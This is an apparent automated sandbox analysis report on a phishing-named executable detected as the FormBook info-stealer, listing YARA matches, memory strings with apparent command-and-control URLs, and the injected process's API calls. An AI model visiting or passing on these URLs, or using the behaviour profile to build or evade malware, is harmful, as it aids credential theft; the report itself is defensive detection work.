6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:11:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: xONxwdydvq.exe, 00000003.00000002.745450083.000000000044C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top
            Source: xONxwdydvq.exe, 00000003.00000002.745450083.000000000044C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top/ed2j/
            Source: RMActivate_ssp.exe, 00000004.00000002.746268139.0000000061EA5000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xONxwdydvq.exe, 00000003.00000002.746297118.0000000005742000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.0000000003702000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 7466H3538.4.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: xONxwdydvq.exe, 00000003.00000002.746297118.00000000055B0000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.0000000003570000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01337099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01337099
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01337294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01337294
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01337099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01337099
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01324342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_01324342
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0134F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0134F5D0

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Payment confirmation 20240911.exe
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C863 NtClose,2_2_0042C863
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C07AC NtCreateMutant,LdrInitializeThunk,2_2_008C07AC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BF9F0 NtClose,LdrInitializeThunk,2_2_008BF9F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk,2_2_008BFAE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk,2_2_008BFB68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk,2_2_008BFDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C00C4 NtCreateFile,2_2_008C00C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C0048 NtProtectVirtualMemory,2_2_008C0048
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C0060 NtQuerySection,2_2_008C0060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C0078 NtResumeThread,2_2_008C0078
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C01D4 NtSetValueKey,2_2_008C01D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C010C NtOpenDirectoryObject,2_2_008C010C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C0C40 NtGetContextThread,2_2_008C0C40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C10D0 NtOpenProcessToken,2_2_008C10D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C1148 NtOpenThread,2_2_008C1148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BF8CC NtWaitForSingleObject,2_2_008BF8CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BF900 NtReadFile,2_2_008BF900
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BF938 NtWriteFile,2_2_008BF938
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C1930 NtSetContextThread,2_2_008C1930
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFAB8 NtQueryValueKey,2_2_008BFAB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFAD0 NtAllocateVirtualMemory,2_2_008BFAD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFA20 NtQueryInformationFile,2_2_008BFA20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFA50 NtEnumerateValueKey,2_2_008BFA50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFBB8 NtQueryInformationToken,2_2_008BFBB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFBE8 NtQueryVirtualMemory,2_2_008BFBE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFB50 NtCreateKey,2_2_008BFB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFC90 NtUnmapViewOfSection,2_2_008BFC90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFC30 NtOpenProcess,2_2_008BFC30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFC48 NtSetInformationFile,2_2_008BFC48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFC60 NtMapViewOfSection,2_2_008BFC60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFD8C NtDelayExecution,2_2_008BFD8C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C1D80 NtSuspendThread,2_2_008C1D80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFD5C NtEnumerateKey,2_2_008BFD5C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFEA0 NtReadVirtualMemory,2_2_008BFEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFED0 NtAdjustPrivilegesToken,2_2_008BFED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFE24 NtWriteVirtualMemory,2_2_008BFE24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFFB4 NtCreateSection,2_2_008BFFB4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFFFC NtCreateProcessEx,2_2_008BFFFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFF34 NtQueueApcThread,2_2_008BFF34
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132713C: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_0132713C
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0131B9F1
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013282D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_013282D0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0130BDF60_2_0130BDF6
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013001830_2_01300183
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012EA0C00_2_012EA0C0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132220C0_2_0132220C
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012E85300_2_012E8530
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013187790_2_01318779
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013006770_2_01300677
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012E66700_2_012E6670
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0134A8DC0_2_0134A8DC
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012F2B400_2_012F2B40
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012E6BBC0_2_012E6BBC
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01300A8F0_2_01300A8F
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012FAD5C0_2_012FAD5C
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012E8CA00_2_012E8CA0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0130AC830_2_0130AC83
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01314EBF0_2_01314EBF
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01300EC40_2_01300EC4
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131113E0_2_0131113E
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013430AD0_2_013430AD
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013012F90_2_013012F9
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0134F5D00_2_0134F5D0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012EF5C50_2_012EF5C5
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131542F0_2_0131542F
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012F36800_2_012F3680
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131599F0_2_0131599F
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0130DA740_2_0130DA74
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012E5D320_2_012E5D32
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012EBDF00_2_012EBDF0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012EDCD00_2_012EDCD0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0130DF690_2_0130DF69
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132BFB80_2_0132BFB8
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01317FFD0_2_01317FFD
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01301E5A0_2_01301E5A
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_002636100_2_00263610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189132_2_00418913
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019A72_2_004019A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101CA2_2_004101CA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416ADE2_2_00416ADE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AE32_2_00416AE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B1D2_2_00402B1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B202_2_00402B20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4732_2_0040E473
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035162_2_00403516
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035202_2_00403520
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EE632_2_0042EE63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027002_2_00402700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008CE0C62_2_008CE0C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008CE2E92_2_008CE2E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009763BF2_2_009763BF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008F63DB2_2_008F63DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D23052_2_008D2305
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0091A37B2_2_0091A37B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0095443E2_2_0095443E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009505E32_2_009505E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008EC5F02_2_008EC5F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009165402_2_00916540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D46802_2_008D4680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008DE6C12_2_008DE6C1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0091A6342_2_0091A634
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009726222_2_00972622
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008DC7BC2_2_008DC7BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008DC85C2_2_008DC85C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008F286D2_2_008F286D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0097098E2_2_0097098E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D29B22_2_008D29B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009649F52_2_009649F5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008E69FE2_2_008E69FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0091C9202_2_0091C920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0097CBA42_2_0097CBA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00956BCB2_2_00956BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00972C9C2_2_00972C9C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0095AC5E2_2_0095AC5E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00900D3B2_2_00900D3B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008DCD5B2_2_008DCD5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00902E2F2_2_00902E2F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008EEE4C2_2_008EEE4C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0096CFB12_2_0096CFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00942FDC2_2_00942FDC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008E0F3F2_2_008E0F3F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008FD0052_2_008FD005
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D30402_2_008D3040
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008E905A2_2_008E905A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0094D06D2_2_0094D06D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0095D13F2_2_0095D13F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009712382_2_00971238
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008CF3CF2_2_008CF3CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D73532_2_008D7353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008E14892_2_008E1489
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009054852_2_00905485
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0090D47D2_2_0090D47D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009735DA2_2_009735DA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D351F2_2_008D351F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0095579A2_2_0095579A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009057C32_2_009057C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0096771D2_2_0096771D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0094F8C42_2_0094F8C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0096F8EE2_2_0096F8EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009559552_2_00955955
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0095394B2_2_0095394B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00983A832_2_00983A83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0095DBDA2_2_0095DBDA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008CFBD72_2_008CFBD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008F7B002_2_008F7B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0096FDDD2_2_0096FDDD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0095BF142_2_0095BF14
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008FDF7C2_2_008FDF7C
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0040E04B3_2_0040E04B
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0040F8D63_2_0040F8D6
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0040F8DB3_2_0040F8DB
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_004091EB3_2_004091EB
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0040726B3_2_0040726B
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_00427C5B3_2_00427C5B
